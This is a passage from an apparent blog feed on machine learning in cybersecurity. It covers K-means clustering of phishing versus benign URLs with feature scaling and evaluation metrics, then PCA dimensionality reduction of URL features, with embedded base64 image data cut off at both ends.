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" /></div>
<div style="text-align: center;">
<i>Figure 3.</i> Visualization of the URLs in two-dimensional space after clustering with <i>K-means</i> and <i>min-max</i> normalization (phishing links - orange dots, benign links - blue dots).</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1gqB1dPTUX6tjvQB81fJ90DR6u6cN0xnyFE0iN2egufgmyQ2My13vvzWHK2XggVwCBwwuncHHnYNu82uB9REr6-2TxCvfnxCkZd2Rfzh7CsAlw7TyCFDbr5ulqE0P1EBDZg42dx2nGLtF/s1600/Kmeans_minmaxnorm2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="270" data-original-width="802" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1gqB1dPTUX6tjvQB81fJ90DR6u6cN0xnyFE0iN2egufgmyQ2My13vvzWHK2XggVwCBwwuncHHnYNu82uB9REr6-2TxCvfnxCkZd2Rfzh7CsAlw7TyCFDbr5ulqE0P1EBDZg42dx2nGLtF/s1600/Kmeans_minmaxnorm2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: left;">
<span id="docs-internal-guid-ec8ae4b6-7fff-ceab-bbdf-5ce4b0196d86"><span style="font-family: "arial"; font-size: 16pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><span id="docs-internal-guid-ec8ae4b6-7fff-ceab-bbdf-5ce4b0196d86"><span style="font-family: "arial"; font-size: 16pt; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div style="text-align: center;">
<i>Figure 4. </i>The training dataset with the labeled data (left) and clustering results <i>K-mean</i>s (right) with <i>min-max</i> normalization.</div>
</div>
<div>
The "classifier's" evaluation:</div>
<div>
<ul style="text-align: left;">
<li>TP = 148, TN = 48, FP = 0, FN = 6 </li>
<li>TPR (Recall) = 96%</li>
<li>TNR = 100% </li>
<li>FPR = 0%</li>
<li>FNR = 3.9%</li>
<li>PPV (Precision) = 1 </li>
<li>NPV = 0.89 </li>
<li>Accuracy = 0.97</li>
<li>F-measure = 0.965</li>
</ul>
</div>
<div>
<div style="text-align: left;">
As you could see, feature scaling can dramatically improve the quality of clustering (classification) from 75% to 97% in terms of Accuracy so that even unsupervised learning can be used for the detection of phishing URLs, of course, in a case when we can identify which cluster contains which URLs. As an option, after clustering URLs, we can scan URLs in each cluster on Virustotal or search on Phishtank to identify the class of the cluster: phishing or benign. According to the calculated above metrics, we need to gather verdicts for more than 2*3.9% (2*max(FNR, FPR)) of phishing URLs to be able to classify the whole cluster like the one that contains phishing links.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
In this post, we considered the imaginary case of URLs clustering that can be turned under some conditions into solving the classification problem. In practice, clustering can also help with identifying a group of unknown malware samples submitted to a malware lab that were missed by a trained classifier (FN) and/or signature scanner and that may belong to the same malware family or written by the same threat actor - the attribution problem. Further, the clustered data that we classified post factum can be used in supervised learning to train the classifier.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
If you want to play with the model, the source code is available on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/tree/master/Courses/ML%20in%20Cybersecurity/Phishing%20detection">Github</a>.</div>
<br />
To be continued...</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-10895552920872722062020-03-18T14:47:00.003-07:002020-11-02T03:21:18.684-08:00AI and Cybersecurity. Part 3 - Dimensionality Reduction and Feature Scaling<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<img height="210" src="https://lh5.googleusercontent.com/8vmVU474H0qdbmVvMtLxmLi_Q4y-ydqh78XczP0SEWrwIijio55kV7lPAN3w3c3x9lfkKXBdCCf-0Vb9Xi42-om6qJ3qLSIm96WhYAu0lZp9bs9K5MEkQRfTrv6WJg7J3s-OaY3A" style="font-family: Arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre-wrap;" width="640" /></div>
<div>
In the previous <a href="https://www.nioguard.com/2020/03/ai-and-cybersecurity-part-2.html">post</a>, we created a binary classifier for detecting phishing URLs. Here, we're going to continue exploring the data with visualization techniques.<br />
<div>
<a name='more'></a>Since the number of features or attributes in a model is often more than 2 or 3 (in real models thousands and even millions), the question arises: how to represent objects or observations in two- or three-dimensional space in order to see the patterns of their data distribution to assess the possibility of further classification or clustering as well as verify the correctness of features extraction. For these purposes, you can use the methods of reducing the dimension. Now, we will consider two techniques - linear (PCA) and non-linear (t-SNE) dimensionality reduction.</div>
<div>
<br />
The <a href="https://en.wikipedia.org/wiki/Principal_component_analysis">Principal Component Analysis (PCA)</a> algorithm carries out a linear mapping of data into a space of lower dimension so that the dispersion of data in a small representation is maximized.<br />
<br />
In our case, after reducing the dimension to two components, we have the following outcomes:<br />
<ul style="text-align: left;">
<li><i>Component 1</i>: −<b>0.998 x Registrar_code</b> + 0.065 x Lifetime + −0.022 x Country_code + 0.006 x Protocol_code</li>
<li><i>Component 2</i>: 0.020 x Registrar_code + −0.035 x Lifetime + −<b>0.999 x Country_code</b> + −0.005 x Protocol_code</li>
</ul>
We see that the domain registrar (<i>Registrar_code</i>) makes the main contribution to <i>Component 1</i> and the country where the server is located (<i>Country_code</i>) to C<i>omponent 2</i>. This can be explained by the fact that both of these values are categorical and after coding using an ordinal number, the attribute values have a large variance and, as a result, dispersion. The scatter of values of the attributes are as follows: Registrar_code: [1, 92], Country_code: [1, 28], Lifetime: [1, 34], Protocol_code: [0, 1]. In this case, it is worth experimenting with categorical data encoding algorithms, for example, to use a one-hot encoding that may affect the PCA components.</div>
<div>
<br /></div>
<div style="text-align: center;">
<img src="https://s.dou.ua/storage-files/image11_gY2LAZP.png" /></div>
<div>
<br /></div>
<div style="text-align: center;">
<i>Figure 1.</i> Visualization of URLs in the two-dimensional space after applying the PCA technique (phishing links - orange dots, benign links - blue dots).</div>
<div>
<br /></div>
<div>
It is difficult to identify separate groups of benign and phishing links in Figure 1.<br />
<br />
Let us do an experiment and scale <i>Lifetime </i>by multiplying its values, let's say, using the coefficient <i>K</i>=100, then we'll see a major impact from this attribute in one of the PCA components and, as a result, another dots distribution on the plot.</div>
<ul style="text-align: left;">
<li><i>Component 1</i>: -0.013 x Registrar_code + <b>1.000 x Lifetime_new</b> + 0.000 x Country_code + 0.000 x Protocol_code </li>
<li><i>Component 2</i>: <b>-1.000 x Registrar_code </b>+ -0.013 x Lifetime + -0.026 x Country_code + 0.003 x Protocol_code</li>
</ul>
<div>
<div style="text-align: center;">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAXkAAAD4CAYAAAAJmJb0AAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+/AAAADh0RVh0U29mdHdhcmUAbWF0cGxvdGxpYiB2ZXJzaW9uMy4xLjEsIGh0dHA6Ly9tYXRwbG90bGliLm9yZy8QZhcZAAAgAElEQVR4nOydd3gc1bm43zOzVVr1akm25Cb3igyY3kkgCSQhhPQAgfSQCzc3hPwSSIGUm14gQEhCbkgIHZLQCTUGjA02uMtVxbJ6WW2fmfP7Y+W15B3ZKqu2Pu/z+NHunNlzvrFW35z5qpBSolAoFIr0RJtoARQKhUIxdiglr1AoFGmMUvIKhUKRxiglr1AoFGmMUvIKhUKRxjgmWoD+FBYWyqqqqokWQ6FQKKYU69evb5NSFtmNTSolX1VVxbp16yZaDIVCoZhSCCH2DTamzDUKhUKRxiglr1AoFGmMUvIKhUKRxiglr1AoFGlMWij5SE8nHbUbiHS3T7QoCoVCMamYVNE1w0VaJm//4bvUv/wImsOFZUQpO+FdLL/6+2gO50SLp1AoFBPOlN7J1z52Jw2vPIYVi2KEerFiUfavfZqt9/1iokVTKBSKScGUVvK7n/w/zGh4wDErGmbvM/eiSigrFArFFDfXxAJ+2+NmJATSAqED0PL2y2z68w8ItR8go6iCJZd/i8IFq8ZTVIVCoZgQpvROPm/2Etvj2TOqEVpcwe97/gFe++HV9O7fgxkJ4W+oZc33Pknj60+Np6gKhUIxIUxpJb/4kzeguzMSCh2hobs8LPn0txLnvHP3920/u/HOb9keVygUinQiJeYaIUQu8HtgMSCBK4DtwN+BKmAvcKmUsjMV6x0kd9YiTr/lAWofvZPuvVvImlHN3PddRXbFXAAsI4oVjdh+1ggONPVIKenYto5ASwM5lfPJqVqQSlEVCoViQkiVTf6XwJNSykuEEC4gA7gBeE5K+UMhxPXA9cDXU7ReAt+0maz43C32g9qRLk8kXkV6Oljz/U8RbNsPUoKU5M9byfHX3YrucqdWYIVCoRhHRm2uEUJkA6cBdwFIKaNSyi7gIuDuvtPuBi4e7VrDRdM0hNNlO6Z7MxOvN9zx/+ht2osZDmJGQpjRMO3b17Pjkd+Nk6QKhUIxNqTCJj8LaAX+KIR4SwjxeyFEJlAipWwC6PtZnIK1hoVpmshY1H4s1Bv/GY3QsvFlpGkMGLeiEeqef2DMZVQoFIqxJBVK3gGsBG6TUq4AAsRNM0NCCHG1EGKdEGJda2trCsQ5hBkNHfUcaRpxE40NlmF/g1AoFIqpQiqUfAPQIKV8ve/9A8SVfrMQYhpA388Wuw9LKe+QUtZIKWuKimwbm4wYl9d31HMc3kyyZ8xLOi50ByUrz0qpPAqFQjHejFrJSykPAPVCiIOa8mxgC/AY8Km+Y58CHh3tWiPBlVNoezyzZEbi9fLP3ozD60Nzxp2sutuLOzufhZf917jIqFAoFGNFqqJrvgzc0xdZsxu4nPgN5D4hxJVAHfChFK01ZKRlEevtsh3rX7Eyp3I+Z//sSWof+z09ddsoXHQis87/OI5+zlkpJbufuJvax+4k6u8kq2w2iz55PcVLTh7z61AoFIqRkhIlL6XcANTYDJ2divlHjkRKy3bEsszEayMUYN2vr6Vz50Y0h4uOHW8SOLCP5Vd/L5Fotf3B37Lrn39I2Pn9jTtZ+9Mvsfr631Mw/7ixvxSFQqEYAVM64/VoCE0nd+Yi27GC+Ydq12y860Y6d2zAikYwgv54NcvXnmDX4/EIUDMWZde//pDkyLWiYbY98KuxuwCFQqEYJWmt5AFiwV7b4wczXs1ohKa1TydF0pjRMHue+gsAke62QSNweht3p1BahUKhSC1preQt0yDQtMd